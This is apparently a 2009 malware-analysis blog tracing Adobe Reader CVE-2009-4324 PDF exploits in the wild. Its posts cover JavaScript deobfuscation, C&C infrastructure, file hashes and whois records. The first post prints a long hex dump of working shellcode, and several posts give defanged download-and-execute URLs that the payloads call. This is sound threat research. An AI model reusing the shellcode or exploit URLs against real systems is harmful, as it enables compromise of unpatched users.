Tuesday, December 29, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.6 – from Taiwan govs with low detection


Through the  contagiodump.blogspot.com report, in this post will be analyzed a PDF with characteristics different from those in previous posts.  The document it’s collected through a mail attachment as well shown in the contagiodump blog:

s004

(http://contagiodump.blogspot.com/2009/12/dec-29-cve-2009-4324-adobe-0-day.html)

In particular, as the first step, the file it’s been opened with an editor (Notepad++).  As always there are some tags that require decoding Inflate to get the code in the clear. But a note of interest it’s been discovered: (since I’m not a PDF specs guru) in  the following statement

s001

In the screen shot above there is a red note that it’s easily confirmed following this Google query:

s002

The /DL token it’s explained in the PDF Specs at following link: http://www.adobe.com/devnet/pdf/pdf_reference.html
In addition the red note  is confirmed by analyzing the Metasploit module for generating exploitable PDF files as shown in the following screen shot:

s003

(From http://www.packetstormsecurity.org/0911-exploits/adobe_pdf_embedded_exe.rb.txt)

In conclusion the PDF stub it maybe generated with Metasploit module. Returning to the analysis using pdf_inflater the only Javascript clear code file obtained is the following:

s005

IMHO this code contains a “not so bad” methods for a good low detection technique.

The shellcode (variable name “sc”) it’s obtained, function urpl at line 1, replacing the “Z” char with “u” obtaining the following UCS2 stream:

s006

Using Malzilla it’s been obtained the following hex stream ready to been posted at http://sandsprite.com/shellcode_2_exe.php

d9c8d97424f4bae7dbd3bc29c95fb19f31571483082731446
c375250e7d8d3bc0f93d1bce752964818ae27d4d41159e70f
3bd2bce752965018ae27d4a8d814030f0bd2bce752965418a
e27d442ccd3c00f1bd2bce752965818ae27d44a40ae630f6b
d2bce752965c18ae27d44bd309ca0f7bd2bce752966018ae2
7d4f1be29ac0f4bd2bce752966418ae27d4f8a2d9540f5bd2
bce752966818ae27d41c4c2eb30fabd2bce752967018ae27d
40b4cd0b00fbbd2bce752960418ae27d411f96ac00f8bd2bc
e752960818ae27d4646266c40f9bd2bce752961018ae27d40
1cc5cc70febd2bce752967818ae27d47f2559b20ffbd2bce7
52967cd42d507ae356961cb78d2ce907e6234ee6dba6526ea
e7335a2274a37aa2782ee188e6b35a2734aeeb5892cc94724
86606a864325b5882cc91b24a61418ae7343b20358f94f9b5
284a1f589d4922c52c4e3f8d53dfeae3d3197d758fcef5296
446eae773162db2d43188bbb2ce6dbd343b2375e39e7252c4
3b7248654205ed342182492df95891439e3252c4383e8e192
205edb42182496e4a2dbb9bc8dd9b9b88ddbb9bf8fdbd3bca
75656bc19242cec188e3735a24758c943502d37aa23b31164
23d3c8e2ee0f663b0178f5ae923153864281ef18ae2bea18
e4f43b20f8543b26f2cc97b248670205ed342182492df9589
1439e3252c4383e8e192205edb42182496e4a2dbb9bc6a5ed
3421824832c7724867c188e17d6e78b2ce94b8886eab050bf
98ff5096806c8fd6c4e40e58f6ff50899ce406308eae50e73
7e42ee0431be81310dd1fa7bb2614debf1f3021879bffc7c9
06508998e406b537eb9058e6fbd80e37e350d0790cd9e07c6
c0e8ce2ba8011b4e78db71dd7dbd3bc621babb06c9bdf3797
c77e37a7d338b56c9be7376763d3bce785102c

Trying to analyze the shellcode  the first step it’s bypass an anti debugging technique. For this goal it’s been pressed the “F7” step by step debugging mode option of IDA Pro. Don’t use “F8”. (many thanks to http://whsbehind.blogspot.com/ for the hints). In this mode it’s possible decrypt (XOR with 0xBCD3DBE7 in EDX) the first piece of runtime code and following in the subsequent steps:

s007

And the following screen shot it’s a step before the setting and jump to the new value of EIP:

s008

The assembly code now it seem interpretable by IDA:

s009

For the shell code, it’s possible analyze the runtime code until a certain point. After it must continue with the static analysis of code and in some cases this approach may be not a good approach. The best approach is run Adobe Reader under debugger, open the malicious PDF file, and identify pieces of code involved in the exploiting and execution of shell code. By way of example on the next screen it’s shown a file size checking conducted by the standalone shell code. In the following picture the shell code it’s executed out from Adobe Reader context, or if you prefer in “standalone mode”. In this condition  there aren’t open PDF file handles. Then ,as in this case, running standalone shell code leads to a condition of infinite loop. So, in conclusion, it’s necessary loading the malicious PDF in the an Adobe Reader context and tracking the behavior with an application debugger.

s010

The 127728 bytes is the size of the PDF file:

image

Trying to analyse the shell code under the Adobe Reader context its been detected the following code from which start to a better analysis:

s011

It’s shown the Multimedia.API plugin code zone where it’s handled the method that trigger the issue. The screen shot above potentially contains info that may be used as starting point for writing  “third part” patch.

For other behaviors like network traffic, dropped file, and system activities please check http://contagiodump.blogspot.com/2009/12/dec-29-cve-2009-4324-adobe-0-day.html.

Adobe CVE-2009-4324 in the wild - (0day) - part 0.5 – yet another Elenore pack

From (thanks to malwaredomainlist ) the follwing URL:

hxxxxp://macaples.in/my_usa/pdf.php 

It’s been downloaded a PDF that looks like similar to those analyzed in the previous post. Again the Javascript code inflated from pdf it’s been contained in 4 files. One of them permit to obtain a clear javascript code. In this case the search is for “lka1” and replace with  “%”

shot001

The obfuscated exploit code appears like the following shots:

shot002

obtaining the following code:

s1 
s2 
s3 
s4 

As shown are exploited the following issues:

CVE-2009-4324
by function printd()
CVE-2008-2992 by function util_printf()
CVE-2007-5659 by function collab_email()
CVE-2009-0927 by function collab_geticon()

The shell code once executed contact the following URL:

shot003

hxxxxxxxxxxxp://macaples.in/my_usa/load.php?spl=pdf_pack

to drop and execute the following binary:

md5 bbaf68dc0071e0c7ff1f5fc6aa711279

As reported by Threatexpert there is network traffic to IP 115.100.250.114

s5

From Robtex http://www.robtex.com/dns/sport-lab.cn.html#shared, more info about this domain

Monday, December 28, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.4 - yourenter.com

 
The following URL it's been reported by malwaredomainlist.com as a pdf exploiter:
 
hxxxxxxp://yourenter.com/pdf.php  (replace hxxxxxxp with http at your risk).

Trying   with wepawet the pdf appears like "benign" (http://bit.ly/7IZ9SH). So it's been started a minimal manual analysis. Following the usual steps with pdf_inflater were obtained the followings clear Javascript code:

1.tmp:

2.tmp:

3.tmp:

4.tmp:

In other words the pieces of code above stands for "search and replace" the string "kru pop 32" with "%".  This step generate a Javascript code encoded in the form of “%<value>” that it’s been decoded with Malzilla support obtaining this code:

As shown above the result is a PDF exploiter that try to trigger the following issues:

CVE-2009-4324 by function printd() - line 10
CVE-2008-2992 by function util_printf() - line 32
CVE-2007-5659 by function collab_email() - line 58
CVE-2009-0927 by function collab_geticon() - line 84
 
The shellcode is the same for each functions (lines 12,34,60,89 in the code above). With Malzilla it's obtained the following result:



So, once the issue is successfully triggered the shellcode try to drop and execute the binary from:
hxxxxxxp://yourenter.com//load.php?spl=pdf_pack  (as already reported by malwaredomainlist.com)
 
The threatexpert analysis it can be found at:  http://www.threatexpert.com/report.aspx?md5=1f5bf5bf2eb28ad8d5808e814f12ce02 

A few of network info related to the starting URL:
rob001
rob002
 
Whois:
inetnum: 217.23.10.0 - 217.23.10.255
netname: WORLDSTREAM
descr: WorldStream IPv4.17
country: NL
admin-c: WS1670-RIPE
tech-c: WS1670-RIPE
status: ASSIGNED PA
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered

Wednesday, December 23, 2009

ebnvnos.com - Flash Java and PDF vulnerabilities in the wild - Waledac - part 0.1

Another URL (many thanks to mdl for rememinder) related to the ebnvnos.com

hxxxxxxxp://ebnvnos.com/lib1/dontLayout.pdf

and related wepawet analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=629a6aa81a426024099807b8c8817063&t=1261430262&type=js

that seem to trigger CVE-2009-0927

So in conclusion, therefore nothing new except the little-known URL.

ebnvnos.com - Flash and Java vulnerabilities in the wild - Waledac - part 0

The domain ebnvnos.com it seem related to once of the spreading stage that exploit something about Adobe Flash Player and Java. The following usually robtex screen shot help to know a bit more about it:



Whois 217.23.12.79:

inetnum: 217.23.12.0 - 217.23.12.255
netname: WORLDSTREAM
descr: WorldStream IPv4.19
country: NL
admin-c: WS1670-RIPE
tech-c: WS1670-RIPE
status: ASSIGNED PA
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered

role: WORLDSTREAM DBM
address: Honderdland 111F
address: 2676LT Maasdijk
phone: +31174712117
fax-no: +31174512310
e-mail: info@worldstream.nl
admin-c: DV1495-RIPE
tech-c: DV1495-RIPE
nic-hdl: WS1670-RIPE
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered


The malicious URL it's:
hzzzzzzp://ebnvnos.com/lib1/ (search and replace hzzzzzzp with http at your risk)

The particularity of this site is that once you request the URL shown,must to wait an undisclosed time to do other HTTP requests. It can be inferred that the admin using the "hit and run" to make more 'difficult behavior analysis. For he next times that it's been requested the URL, the HTTP session it's hijacked to Google.

For keep a track of the facts it's been used wireshark. In this manner it's been discovered an exploiter that try to render 3 resources:

- a java class named:
isWith.class
- an swf object named:
ametMany.swf
- another swf object named:
goingBook.swf

The following shots shown the HTTP traffic related to the three object above:

An abtstract of the exploiter code:




The HTTP request once the exploiter it's run:





For a quickly analysis it's been used wepawet for goingBook.swf with the following result:
http://wepawet.cs.ucsb.edu/view.php?hash=3e107aa57b86deea966ab75c587f310b&type=swf

With a reminder to virustotal:
http://www.virustotal.com/analisis/9916df6c1e603ec297ee0489ef8774cce263860b48c2faf93917739d3ac6afe5-1261592005

A not so good analysis by anubis:
http://anubis.iseclab.org/?action=result&task_id=152965b4ce503e7b4b9f2caf56bddf37b&format=html

Anubis HTTP request appears like filtrate by the host above

Using an exploitable system, calling the malicious URL above, are been dropped the following binaries:

_ex-08.exe (md5 708aa73ace4e76988b8f295a2ed619cb)
http://www.threatexpert.com/report.aspx?md5=708aa73ace4e76988b8f295a2ed619cb
A note of interested is the following IPs list contacted by the binary above:

AS | IP | AS Name
1221 | 58.164.81.97 | ASN-TELSTRA Telstra Pty Ltd
3462 | 114.46.137.39 | HINET Data Communication Business Group
3784 | 141.223.131.191 | ERX-POSTECHNET Pohang University of Science and Technology
4766 | 112.166.68.146 | KIXS-AS-KR Korea Telecom
4766 | 112.172.161.208 | KIXS-AS-KR Korea Telecom
4766 | 118.33.251.194 | KIXS-AS-KR Korea Telecom
4766 | 118.42.252.43 | KIXS-AS-KR Korea Telecom
4766 | 118.46.248.41 | KIXS-AS-KR Korea Telecom
4766 | 119.198.133.167 | KIXS-AS-KR Korea Telecom
4766 | 119.203.58.72 | KIXS-AS-KR Korea Telecom
4766 | 119.205.26.248 | KIXS-AS-KR Korea Telecom
4766 | 119.207.3.95 | KIXS-AS-KR Korea Telecom
4766 | 119.207.4.172 | KIXS-AS-KR Korea Telecom
4766 | 121.131.83.41 | KIXS-AS-KR Korea Telecom
4766 | 121.133.163.17 | KIXS-AS-KR Korea Telecom
4766 | 121.139.43.91 | KIXS-AS-KR Korea Telecom
4766 | 121.140.239.124 | KIXS-AS-KR Korea Telecom
4766 | 121.142.10.207 | KIXS-AS-KR Korea Telecom
4766 | 121.145.223.211 | KIXS-AS-KR Korea Telecom
4766 | 121.145.245.42 | KIXS-AS-KR Korea Telecom
4766 | 121.146.70.163 | KIXS-AS-KR Korea Telecom
4766 | 121.154.247.235 | KIXS-AS-KR Korea Telecom
4766 | 121.157.70.230 | KIXS-AS-KR Korea Telecom
4766 | 121.158.254.64 | KIXS-AS-KR Korea Telecom
4766 | 121.158.66.40 | KIXS-AS-KR Korea Telecom
4766 | 121.167.225.111 | KIXS-AS-KR Korea Telecom
4766 | 121.168.26.108 | KIXS-AS-KR Korea Telecom
4766 | 121.172.98.145 | KIXS-AS-KR Korea Telecom
4766 | 121.174.84.123 | KIXS-AS-KR Korea Telecom
4766 | 121.177.129.115 | KIXS-AS-KR Korea Telecom
4766 | 121.181.206.132 | KIXS-AS-KR Korea Telecom
4766 | 121.186.57.109 | KIXS-AS-KR Korea Telecom
4766 | 121.187.218.104 | KIXS-AS-KR Korea Telecom
4766 | 121.189.184.161 | KIXS-AS-KR Korea Telecom
4766 | 211.105.102.48 | KIXS-AS-KR Korea Telecom
4766 | 211.194.174.90 | KIXS-AS-KR Korea Telecom
4766 | 211.221.151.20 | KIXS-AS-KR Korea Telecom
4766 | 211.223.29.20 | KIXS-AS-KR Korea Telecom
4766 | 211.229.142.10 | KIXS-AS-KR Korea Telecom
4766 | 211.231.18.31 | KIXS-AS-KR Korea Telecom
4766 | 211.35.145.201 | KIXS-AS-KR Korea Telecom
4766 | 220.116.76.18 | KIXS-AS-KR Korea Telecom
4766 | 220.120.63.244 | KIXS-AS-KR Korea Telecom
4766 | 220.121.21.216 | KIXS-AS-KR Korea Telecom
4766 | 220.82.100.217 | KIXS-AS-KR Korea Telecom
4766 | 220.83.101.42 | KIXS-AS-KR Korea Telecom
4766 | 220.86.224.160 | KIXS-AS-KR Korea Telecom
4766 | 221.156.113.180 | KIXS-AS-KR Korea Telecom
4766 | 221.161.156.247 | KIXS-AS-KR Korea Telecom
4766 | 221.164.249.135 | KIXS-AS-KR Korea Telecom
4766 | 61.81.33.88 | KIXS-AS-KR Korea Telecom
4766 | 61.82.13.32 | KIXS-AS-KR Korea Telecom
6746 | 85.186.0.216 | ASTRAL UPC Romania Srl, Romania
6746 | 89.136.87.60 | ASTRAL UPC Romania Srl, Romania
6830 | 80.98.91.127 | UPC UPC Broadband
9318 | 114.201.176.206 | HANARO-AS Hanaro Telecom Inc.
9318 | 114.202.35.143 | HANARO-AS Hanaro Telecom Inc.
9318 | 116.121.226.26 | HANARO-AS Hanaro Telecom Inc.
9318 | 180.70.64.142 | HANARO-AS Hanaro Telecom Inc.
9318 | 211.177.99.161 | HANARO-AS Hanaro Telecom Inc.
9318 | 211.207.180.117 | HANARO-AS Hanaro Telecom Inc.
9318 | 211.209.13.189 | HANARO-AS Hanaro Telecom Inc.
9318 | 61.255.79.225 | HANARO-AS Hanaro Telecom Inc.
9319 | 210.124.149.173 | HCNCHUNGJU-AS-KR CHEONGJU CABLE TV SYSTEMS
9323 | 210.94.189.119 | DGUNET-AS Dongguk University Information Management Center
9569 | 210.57.254.156 | HCNSEOCHOCATV-AS-KR SEOCHO CABLE SYSTEMS CO., LTD.
9694 | 124.153.148.82 | SEOKYUNG-CATV-AS-KR Seokyung Cable Television Co..LTD.
9756 | 211.247.34.208 | CHEONANVITSSEN-AS-KR Cheonan Broadcast Corporation
9943 | 113.10.20.29 | KNCTV-AS Kangnam Cable TV
10036 | 120.142.121.192 | CNM-AS-KR C&M Communication Co.,Ltd.
10036 | 121.88.142.144 | CNM-AS-KR C&M Communication Co.,Ltd.
11427 | 72.177.204.239 | SCRR-11427 - Road Runner HoldCo LLC
17488 | 116.72.208.60 | HATHWAY-NET-AP Hathway IP Over Cable Internet
17820 | 210.7.73.6 | DIL-AP DIRECT INTERNET LTD.
17858 | 112.150.254.18 | KRNIC-ASBLOCK-AP KRNIC
17858 | 115.137.20.63 | KRNIC-ASBLOCK-AP KRNIC
17858 | 115.140.151.63 | KRNIC-ASBLOCK-AP KRNIC
17858 | 115.140.159.60 | KRNIC-ASBLOCK-AP KRNIC
17858 | 119.64.109.187 | KRNIC-ASBLOCK-AP KRNIC
17858 | 119.70.120.112 | KRNIC-ASBLOCK-AP KRNIC
17858 | 124.50.100.62 | KRNIC-ASBLOCK-AP KRNIC
17858 | 124.54.117.157 | KRNIC-ASBLOCK-AP KRNIC
17858 | 124.56.83.94 | KRNIC-ASBLOCK-AP KRNIC
17858 | 125.180.16.50 | KRNIC-ASBLOCK-AP KRNIC
17858 | 125.182.165.136 | KRNIC-ASBLOCK-AP KRNIC
17858 | 125.187.168.223 | KRNIC-ASBLOCK-AP KRNIC
17872 | 210.125.92.98 | SUNGSHIN-AS-KR SUNGSHIN WOMEN_S UNIVERSITY
18302 | 124.136.47.172 | SKG_NW-AS-KR SK Global co., Ltd
18302 | 165.194.116.237 | SKG_NW-AS-KR SK Global co., Ltd
18330 | 220.95.142.203 | HONGIK-AS-KR HONGIK UNIVERSITY
20845 | 94.21.199.32 | DIGICABLE DIGI Ltd.
22258 | 98.239.53.112 | COMCAST-22258 - Comcast Cable Communications Holdings, Inc
25375 | 212.203.37.187 | LEU-AS Leunet AG
31554 | 89.44.131.200 | ALTFEL SC Almsoft Computers SRL
33668 | 69.137.212.184 | CMCS - Comcast Cable Communications, Inc.
33668 | 98.224.160.221 | CMCS - Comcast Cable Communications, Inc.
35505 | 89.38.195.16 | PRONETIT-AS SC Pronet Solutii IT SRL
35530 | 93.126.104.158 | PROLINE Proline TM Ltd.
39006 | 85.202.221.144 | NETIS-AS Systemy Informatyczne Netis Sp. z.o.o.

( generated with the support of cymru whois service)
Theese sound like a fastflux architecture

32782224.exe (md5
770199bb1a8aa78ccccd135656cc8ca7)
http://www.threatexpert.com/report.aspx?md5=770199bb1a8aa78ccccd135656cc8ca7

153.exe (md5 9d702b6292dff05453fb475a08842a2c)
http://www.threatexpert.com/report.aspx?md5=9d702b6292dff05453fb475a08842a2c
This binary it maybe ike an evidence for waledac connection

Saturday, December 19, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.3 - merry christmas from (for) Taiwan ? :)

Again from contagiodump... (merry christmas pdf) the following screen shot shown a 955bade419a9ba9e5650ccb3dda88844 obfuscated javascript code extracted from once of the stream objects within the pdf



The PDF (
955bade419a9ba9e5650ccb3dda88844) generate (if the issue is triggered with success) a binary that became an .exe file named "temp.exe" with path "C:\Documents and Settings\Admin\Local Settings".
The following link is the Anubis response to the exe:
http://anubis.iseclab.org/?action=result&task_id=18d9ed8740a9d94b469c492638799bb60&format=html

As shown in the anubis analysis the dropper create another binary named "msupdater.exe" located in
"C:\Documents and Settings\Admin\Local Settings\Application Data". The Anubis response for "msupdater.exe":
http://anubis.iseclab.org/?action=result&task_id=194fa0dfd87d1f9742d334f13b27666d3&format=html

Once msupdater.exe it's executes is generated the following (really strange) traffic:



As shown in the screen shot (sorry for the copy on labs folder :) ) above, the ip of interest (used for strange HTTP "ping" traffic as well a sort of port knocking) it seem the following: 140.112.40.7. From Robtex it's been obtained the following graph:




Whois 140.112.40.7:

inetnum: 140.112.0.0 - 140.112.255.255
netname: TANET
descr: Taiwan Academic Network
descr: Ministry of Education computer Center
descr: 12F, No 106, Sec. 2, Heping E. Rd., Taipei
country: TW
admin-c: TA61-AP
tech-c: TA61-AP
mnt-by: MAINT-TW-TWNIC
changed: hostmaster@twnic.net.tw 20030908
changed: hm-changed@apnic.net 20040926
status: ALLOCATED PORTABLE
source: APNIC

Another interesting IP (observed during launch of msupdter.exe) shown in the WireShark cap above is:
209.85.227.104 that stand for:
wy-in-f104.1e100.net


AS15169 stand for google.com

so 209.85.227.104 it's Google :)


Anyway yet another reverse engineering analysis about this issue you can be found at
http://whsbehind.blogspot.com

Friday, December 18, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.2 - shellcode and site down

It seem that the spreading infrastructure it's down (or may be the admins has change domains or paths as well ). Anyway the following screenshots shown the shell code embedded in one of the well know PDFs (thank you contagiodump.blogspot.com) . For inflating deflate PDF stream it's been used PDF_streams_inflater tool (not more available from malzilla site)

http://www.mc-antivirus-test.com/modules/PDdownloads/singlefile.php?cid=6&lid=25

The dissected PDF has the following MD5: 35e8eeee2b94cbe87e3d3f843ec857f6 but it seem that also
61baabd6fc12e01ff73ceacc07c84f9a use the same shell code


so.. the first step for retrieve usefull code is a simple override of eval javascript method:




the following screenshot shown some clear string within the shellcode:



may be a check for Kasperksky tools at runtime and check for Kingoft security tools. And the evidence for the user agent AdobeUpdate (as well documentend in the F-secure post about subject) used for HTTP request.

For obtain,quickly, a PE binary from shell code it's been used:
http://sandsprite.com/shellcode_2_exe.php

The check above during runtime:



The XML code that define an embedded RAR file discovered inside 35e8eeee2b94cbe87e3d3f843ec857f6:




The Anubis analysis of the RAR (in the form of exe RAR compressed archive) extracted from the pdf above:
http://anubis.iseclab.org/?action=result&task_id=106dc12f361a9afd4156862d5f34f1c77&format=html


The RAR contents:



The RAR compressed exe file it's runned by shell code under certain conditions.


Tuesday, December 15, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.1 - browsing C&Cs

"playing" with one of the URL, run by a C & C (see previous post http://extraexploit.blogspot.com/2009/12/adobe-cve-2009-4324-in-wild.html) you can access some path in which are content folder names match (probably) to hostnames infected. In the following scheenshots is documented the browsing for dailysummary.net

The root path:



The host names list:




The content (probably encrypted file):



The root path for somus.net:



Adobe CVE-2009-4324 in the wild - (0day) - part 0

A quick analysis (This post is under update):


Something more from other site:

A detailed CVE-2009-4324 analysis
(many thanks vrt-sourcefire team :) ) :
VRT-Sourcefire
http://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

Other interesting analysis about from contagiodump.blogspot.com (many thanks contagio :)) :
http://contagiodump.blogspot.com/2009/12/adobe-cve-2009-4324-posts-with-infected.html
http://contagiodump.blogspot.com/2009/12/zero-day-pdf-attack-of-day-2-interview.html

Malwaredomainlist
http://www.malwaredomainlist.com/forums/

A bad news about CVE-2009-4324
New exploit in the wild capitalizes on flaw in JavaScript function, patch to come January 12 (Darkreading)
http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=222002143

F-secure analysis
(probably after this initial post:) ) of binary above (sorry see below :) with some info about HTTP C&C
http://www.f-secure.com/weblog/archives/00001836.html

Adobe PSIRT Blog
http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html


Metasploit module:
http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb


My not so linear analysis:

The malicious PDF is spreaded via email attachments. The following URLs it seemrelated to this issue (used by Trojan.Pidief.h as dropper. Low AV detection rate at the firs Virustotal submission.):
hzzzzzp://foruminspace.com/documents/dprk/ab.exe (replace hzzzzzp with http at your risk)

Virustotal analysis
https://www.virustotal.com/analisis/d6afb2a2e7f2afe6ca150c1fade0ea87d9b18a8e77edd7784986df55a93db985-1260858538

ThreatExpert analysis:
http://www.threatexpert.com/report.aspx?md5=686738eb5bb8027c524303751117e8a9


Robtex response for malicious domain above (
foruminspace.com):

A bit more:



Whois 124.217.238.101


inetnum: 124.217.224.0 - 124.217.255.255

netname: PIRADIUS-NET
descr: PIRADIUS NET
country: MY
admin-c: PA124-AP
tech-c: PA124-AP
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
mnt-by: APNIC-HM
mnt-lower: MAINT-MY-PIRADIUS
changed: hm-changed@apnic.net 20071217
source: APNIC

person: PIRADIUS NET Administrator
nic-hdl: PA124-AP
e-mail: abuse@piradius.net
address: PIRADIUS NET
address: Unit 21-3A, Level 21
address: Plaza DNP 59, Jalan Abdullah Tahir
address: Taman Century Garden
address: 80300 Johor Bahru, Johor
address: Malaysia
phone: +607 334 8605
fax-no: +607 334 8605
country: MY
changed: admin@piradius.net 20071003
mnt-by: MAINT-MY-PIRADIUS
source: APNIC


Some piece of reversing related to "ab.exe":

the list of process "unfriendly" searched in memory:



An antidebugging technique discovered in the dropper (thank to 0xff for support) and other pieces of checking stage in the name of a "good local malware ecosystem":



An HTTP command from infected host for the C&C HTTP based:




The command that was send from "infected" host:




The commands are sent at two hostname: dailysummary.net and somus.net





A note of interest is the MX record that point at the C&C hostname. The following pictures (still generated by robtex) shown the impressive number of domains assiged to the ip 124.217.238.192 (
dailysummary.net)


(generated from http://www.robtex.com/ip/124.217.238.192.html#graph)

and to the ip 124.217.238.100 (somus.net)

(generated from http://www.robtex.com/ip/124.217.238.100.html#graph)